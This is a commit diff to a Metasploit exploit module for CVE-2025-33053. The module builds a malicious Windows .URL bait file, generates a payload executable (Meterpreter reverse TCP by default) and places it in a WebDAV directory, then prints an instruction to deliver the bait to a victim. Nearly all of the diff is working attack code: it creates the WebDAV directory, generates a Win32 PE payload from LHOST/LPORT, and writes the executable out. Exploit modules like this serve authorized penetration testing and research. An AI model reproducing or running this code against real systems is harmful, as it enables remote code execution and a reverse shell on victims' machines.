Update cve_2025_33053.rb

DevBuiHieu · web-flow · commit dd51952b67d9 · 2025-06-19T21:32:34.000+07:00
diff --git a/modules/exploits/windows/fileformat/cve_2025_33053.rb b/modules/exploits/windows/fileformat/cve_2025_33053.rb
@@ -1,10 +1,7 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
+# frozen_string_literal: true
 
+# Metasploit module to exploit CVE-2025-33053 via malicious .URL and WebDAV payload hosting.
 class MetasploitModule < Msf::Exploit::Remote
-  include Msf::Exploit::Remote::HttpServer
   Rank = NormalRanking
 
   def initialize(info = {})
@@ -29,18 +26,7 @@ def initialize(info = {})
         ],
         'Platform' => 'win',
         'Arch' => ARCH_X64,
-        'Targets' => [
-          [
-            'Windows (generic)',
-            {
-              'Platform' => 'win',
-              'Arch' => ARCH_X64,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-              }
-            }
-          ]
-        ],
+        'Targets' => [['Windows (generic)', {}]],
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -52,8 +38,9 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('FILENAME', [true, 'Output URL file name', 'bait.url']),
+        OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
         OptString.new('PAYLOAD_NAME', [true, 'Output payload file name', 'route.exe']),
+        OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
         OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
         OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav'])
       ]
@@ -71,11 +58,21 @@ def initialize(info = {})
   end
 
   def exploit
+    prepare_webdav_dir
     generate_payload_if_needed
     write_url_file
     print_status("Module complete. Deliver #{File.expand_path(datastore['OUTFILE'])} to victim.")
   end
 
+  def prepare_webdav_dir
+    print_status('Creating WebDAV directory if not exists...')
+    FileUtils.mkdir_p(datastore['WEBDAV_DIR']) unless File.directory?(datastore['WEBDAV_DIR'])
+  rescue Errno::EACCES
+    fail_with(Failure::NoAccess,
+              "Cannot create WebDAV directory. Permission denied.\n" \
+              "Try restarting Metasploit with sudo or change ownership of #{datastore['WEBDAV_DIR']}.")
+  end
+
   def generate_payload_if_needed
     return unless datastore['GEN_PAYLOAD']
 
@@ -85,9 +82,20 @@ def generate_payload_if_needed
   end
 
   def generate_payload_exe(payload_name, lhost, lport, output_path)
-    write_exe_file(output_path, payload.encoded)
+    payload = framework.payloads.create(payload_name.to_s.strip)
+    payload.datastore['LHOST'] = lhost
+    payload.datastore['LPORT'] = lport
+    raw = payload.generate
+    exe = Msf::Util::EXE.to_win32pe(framework, raw)
+    write_exe_file(output_path, exe)
   end
 
+  def write_exe_file(path, exe)
+    File.open(path, 'wb') { |f| f.write(exe) }
+    print_good("Payload successfully written to #{path}")
+  rescue Errno::EACCES
+    return_error(path)
+  end
 
   def write_url_file
     content = generate_url_content
